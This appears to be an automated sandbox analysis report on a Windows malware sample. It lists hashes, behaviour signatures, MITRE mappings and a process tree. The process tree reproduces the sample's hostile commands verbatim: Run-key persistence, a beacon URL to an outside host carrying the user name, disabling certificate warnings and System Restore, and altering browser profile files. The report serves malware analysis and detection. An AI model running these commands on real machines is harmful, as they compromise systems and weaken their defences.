Analysis
-
max time kernel
122s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
23/07/2024, 00:14
General
-
Target
6562700bd30a21641b31cd7ea4982beb_JaffaCakes118.exe
-
Size
23KB
-
MD5
6562700bd30a21641b31cd7ea4982beb
-
SHA1
5a4ea1fccbd66bbcf76d1185d61947660063514a
-
SHA256
c99ffd11a2c7f084a2ac3d906e4baa761e568fa19677a8633bcacbb32edd59af
-
SHA512
220b2e5671fc298e8afd1f125254d164ce4fe43691e5a29eb19b4ba7439d921ad6d8bb99db8488db181e33f73eb7ecf42e042d92d39ebbec1e06fb9f0a602324
-
SSDEEP
384:cr9sOcIp6wRcsSYLvKWLWbstQTid6HJyraXkqdkJ7PNWobd0eXVfaNJawcudoD7I:QmOhplcsHvKWzX6HJmFqda7koPAnbcuy
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6562700bd30a21641b31cd7ea4982beb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\6562700bd30a21641b31cd7ea4982beb_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7CFD.tmp\novo.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "ActiveX Update" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\AxUpdateMS.exe" /f3⤵
- Adds Run key to start application
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" "http://sivellongrupp.ee/plugins/ups.php?a=Admin&b=MGWWAYYN"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2604 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "4⤵
-
-
C:\Windows\SysWOW64\find.exefind "prefs.js"4⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrxx2hps.default-release\prefs.js "3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrxx2hps.default-release\prefs.js "3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrxx2hps.default-release\prefs.js "3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "3⤵
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\system32\find.exe "Internet Explorer\Main"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "4⤵
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\system32\find.exe "S-1-5-21"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKU\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKU\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKU\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f3⤵
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\Admin.reg"3⤵
- UAC bypass
- Runs .reg file with regedit
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342B
MD5bbe472e255cc537b85538c818eeb4777
SHA11416b09b287651eacab21f4ed8f043e963bc52e9
SHA256f70fb41c168d330491eedad0382b225af9c9caaa4ddfdae5ff1ebae26642d006
SHA512756ce44a86f262b84937254b48c551d6a13f9e0dd888107d535db3d086e62f778e7e629cfc9f0f4c2efd98f6bb4a2dfb709ca8d4ba762dd2531e980ca7c443f9
-
Filesize
342B
MD5210c7228ee43388adc4c1ccc5d223fcf
SHA1f6348bf2878b842d006935f7d0e83ff9431c3494
SHA2564e4ec477b51524e8a745689760585a9d4ea6350ea596def1e885f0d18f29cd70
SHA512ec22fdbd57b66428e4b938afc4b8a7494c1c395c9100d2277437c295ac3b92e1a5d5e617d018519acb95fbfb590852f71488d3a7d9271d52a404729c91c59a8a
-
Filesize
342B
MD57ce78efbea274a2ea293ecf98862083e
SHA1fd55e0750aa77aaaeb7eb85787785831ac7e3a3b
SHA2563b528e40955db537837f1abd28e8cef53d2afea2a00747dd68b2ac6ef584b992
SHA51293230dea8bc83a9d556db3c5a9cfe9265771414884fd020dd462a972603812ae2269aee962a5d80897a1afcf7411f9424cc1140718dd40cafe90b5ee8a676526
-
Filesize
342B
MD5dfeb996d5a5805779246f7e660070ea4
SHA1dcc0dc8afc1b8f78beb2e01c642075af06180353
SHA256a0aa627fb35fb88d3bf05897501ecec5cf53d23a6aba3a10db49f694c77fc61a
SHA5124e758d2415a6f19670b95aa64bc12dc43a973c3fa7c7386a9a91d893df3b6b57ce07af4064785e9e52facd1e912c0d6963e78fc1add653b280594db1bd0c5fc7
-
Filesize
342B
MD5206ddc2d0882dc98880d59a5d996805d
SHA1dbddbd4c6d593a42e63e2c789475ce6ab2e54e11
SHA2564f9bb3921794e1410c7c7a8af15f40abdae0777fb657a2457c8253501efce75c
SHA512b1eafd4ee4da67d0ac7e1baeee32fae2db22ba6aa504684b7da6908e0c148b042a05d8fe8efeca7df23d11f3d4fbfa77f6946436dc500b2f34e35b2d5936b46b
-
Filesize
342B
MD5b493af115ef9c4b001190ddeb1f8d557
SHA1321ea1faecc04789713bf53251042b28b7675ffe
SHA256a219dce0c0342a812c56abe89a1e1ea0313ee734a210b7b838ed4145d5685ae4
SHA5121100cbd727cbacc69a949d4a852ca8cbb1e827b147fb9ad3aabd8faf7ba5ed663f57a3f65f721d8e7f221a72b1e79cc6088e7683885537edf6ed3963adfa9462
-
Filesize
342B
MD534cdccfab4f1b915e854745e119d60e1
SHA1203af18b532a3ee0bf6911a3dfcba486d642eea6
SHA256564e9c1fb97c2687dabfb6f8b5b9797bf847d660e279a978d3098571c833578a
SHA5126e1a874875c57ee346845e49790a347cf3ef7e83516279b0afee50c1f65fc82ea126e6b683f2427173ebc96516f9d14e3ddc340c46fb9f4f83f8ba113762d344
-
Filesize
342B
MD559113bea2e2148a1be3feb00f4185c67
SHA14f8071b4692dd5a2e64c0614a331eb96878298a3
SHA2568fb492b255cb26c655d4409b89f366a3cb4287a1be271e20650ebe790105fe0c
SHA512e201fe723a617df4d6bb4a2616d598a14371b3a42612bb01a92e8a20d7a615b890d8199e49c0c33c814f577091efc4cca27105f0570eb3f32a32cedbe99ba001
-
Filesize
342B
MD55e9005d4b447b94c5b0d50df23af5e7e
SHA1d595dd8167529603cc1f69bc8dd25d6033ee97b0
SHA256187cf85dd3a0a8d3b1f547cc22184bb5be91c4f71d7d8c1baa68604b2dc2ec5a
SHA512a69a92546fba511988e285097815ca834008ef0a21077b227f62a6b892fe9c5f1460afe233d3ee90e68733a78a954ac1845ba3d4004e00c0eb85d4854d1a2ec0
-
Filesize
342B
MD509c9e3154fbafc45ace4f79146a0f4e9
SHA1d22a4fc1c5ed915668a562c8fd1f0536368c4c8b
SHA2562c6cbd05788a849fa316273247c0419459f3fc3ef5257d5677298e15e78ec417
SHA5126f7f620a80a2be623e2bf8a664777f506f8750c9d706b1da3a352ea7a08103cca4b12a3bfbee0bb4d4930c85c6460c50ab44e241d23c8f68bdf14a6d6e775690
-
Filesize
342B
MD56d10a7d8f2fe8ef6a286bff2d3ad27ea
SHA11d6850ed471126e0c24aa5ce2303de40d8c9839c
SHA25687e3289acbbd229a7ba76a66f9aa05fbe55033485ca21ca2c10ec2b8b02c56bf
SHA512a6aadb0dcc45e938fc6ba97740cdf6d0526f45f22453a691b81770680587a8c81ff605c4474e4b3749727df61c42d6de384b1f5a4dca4c899d3432c9ad2eab5e
-
Filesize
342B
MD57f7333921d9947a167955c3e6145bd56
SHA1509f5c088879623d28d89fd60900c5f47caa540e
SHA256a82bb4e664b77bb7c881badd84d881a92fca5369ee7f7f070cfe63016815fc4a
SHA512b78fb4b53e1acddb62fb1b0d842f06e4463ec4eb90b60138d0c5c6499f830dd7ec708347f991717d6cebe510113145ea2ac35423efb8a3c0777ec3aa07a0dd0b
-
Filesize
342B
MD55f6e48648fb18dd13950dc5bb7db8ea1
SHA196daae932586a1a9ab67a21374c1bbcad6a07c37
SHA25681873bb0f1e1fe3e92539beea3c973ff6e6608ce4faff0854fb5863e870b9245
SHA5128c89da1ac76c8d72eab7afa7ae01f613d5a8cf87c1d0f072913425f94c86ca87346c6a2357a0ea8d9bd3ab07fd3b7c7fb16dca05d09fc45ea6a521d588ded8f9
-
Filesize
342B
MD54b46f0ab9aff01535f80f12b6d45efac
SHA125cc85054606436645eff234bd14bb4713ba1477
SHA256321e8715e625c652655a1dc11c9e8839ba8b4a4574f921fc01ccddbf725d7c80
SHA512dd160dd4fb7cedb887f4506289603f32a11b6fbbb6a2dc9c8381ef63350f1aea01daa147002b85ed3453fadf1b7e25318bed8be0208ee9556901542997106727
-
Filesize
342B
MD5df784c3691f5a58f1f19d01544472b24
SHA16648531485c794bbfb9ff8a47990c71026e11dd9
SHA256a61effb356887b431c84ba1d5a58a57bea95a2400a475a6811f194007d93caf5
SHA512bd19353cb266c8f3058ed35d673e5147cd2f859361d462959908dd3a4ccf058dd10655c4657a95395eec5f2e5027dfd5ce8a867cd78c9d3d16f88c63ddab9a3b
-
Filesize
342B
MD594800caf14bc11730d25f3e63e72570b
SHA10c50c69afa55d664d59ede32800678b5a1eb98c2
SHA256e720438dcfede170cda72db7d06da104bbccf5ba626fc85ce9a339136e3df907
SHA5129c9dd145b1d0a441cd21914dab9d5fbfbb3c194c780a1712e0eb9956bc6f1d6593bddf79f6cad7230967d9ece57bb866ed5b3457808dc36ee236c65d9ab0968e
-
Filesize
10KB
MD5a8df7a3c87920900dff02fa04cf10e18
SHA137e1432ed9abb2e4af331ab895af4dae95e7d0fd
SHA2564dfd3af1586a81ea9e96bdbdff7ccd580f67f180830fd3ddda9f1f5c85beaef1
SHA512cec20675156c99467262d61a57435dfe8d745e0999b841c7b8fae30a3d9ec43bd9b9b519c28d60bef4c6e82c1c1b0d10874059e2d9dd00fad273fae86896fb00
-
Filesize
2KB
MD5f7b30fd2e305554ed68c550b251243a9
SHA177ce49821cc1fa2a8c532a1f6d62983df8bd8371
SHA2566470b6d51ca0cfce37999dc39078568da3f8172edcac704228ec9c6edbfae41e
SHA51216e2ce4cd6920c7251a130b0568291835f31902ededd5bb3e0bfea0a30fcbe81d27eaa433baf1b98e782eaab8c2e58a5ddcdf49764d5ed1ecc243a0d629c69e9
-
Filesize
2KB
MD56f39f1af4f68e652bdc9fdd7be9a4f8d
SHA197af5142916be5ea6bc166e26fd7bf9c5df3c45f
SHA2560f5285f27dbe9972b9d6a65d4d36f0b99bb5ea4611d0d7bffc073d6421980a1d
SHA5123c87e369f89c089ddaa48ed00effd9bb928d99aac095311afa455d7491e309cb5762c966cd6fd565ca8c710d9dc5d6870a61933a2cc82f7b43258a17d494ccdc
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
929B
MD5acff4244b7423b6bd092edd17d023526
SHA1e096d65ebac46779ad06d2620f25ef1996c704bc
SHA256e5481bd208f0486aa30a15360500c94351817e77d5886b265144054330cba4a0
SHA5123d97dd2d53329bdc3e8e4d83ac6bb0a34101dd434520bcd2c4ad41b832e46ee705dc4f97961cfdec19515959c7fc800bdbd39ef4ec71dcdaf5582726201a18e2
-
Filesize
3.5MB
MD5fcdf23e0adcf3c54afb219ca39dc5a0d
SHA1fdea8628a59d5b773ebb44aae539700f2fe115a0
SHA2567b04981c268b7a9fb5c6656c35f3093e50f5a7ced020c50d78002ca81b0ef26b
SHA5129d81239f465d0dfa355bfaebfffa65b89985c2c5a743d3efc715d8529f096dfd3bf0b383e533ba7d5468867dfb48dcd33a9a90d20ef0691fa625a8ab049afc17
-
Filesize
6KB
MD5fe902e76a73ffc0e316304d0224f2eb8
SHA1bf54216ba7bd004e635534617dc30669505cbd06
SHA256ec52ea8acb8859bebb58ff12965328a8daf0060aa2da43b3c45a8aac9b69456a
SHA5122c5ac66a19621616ba700f645d90aa94131a0b2e7913aff782752247c0b108d6ef39bcd116d3b831a206acbca7b757d5ad3bed8cfc646fc8f78e48883d3321c4
-
Filesize
76KB
-
Filesize
76KB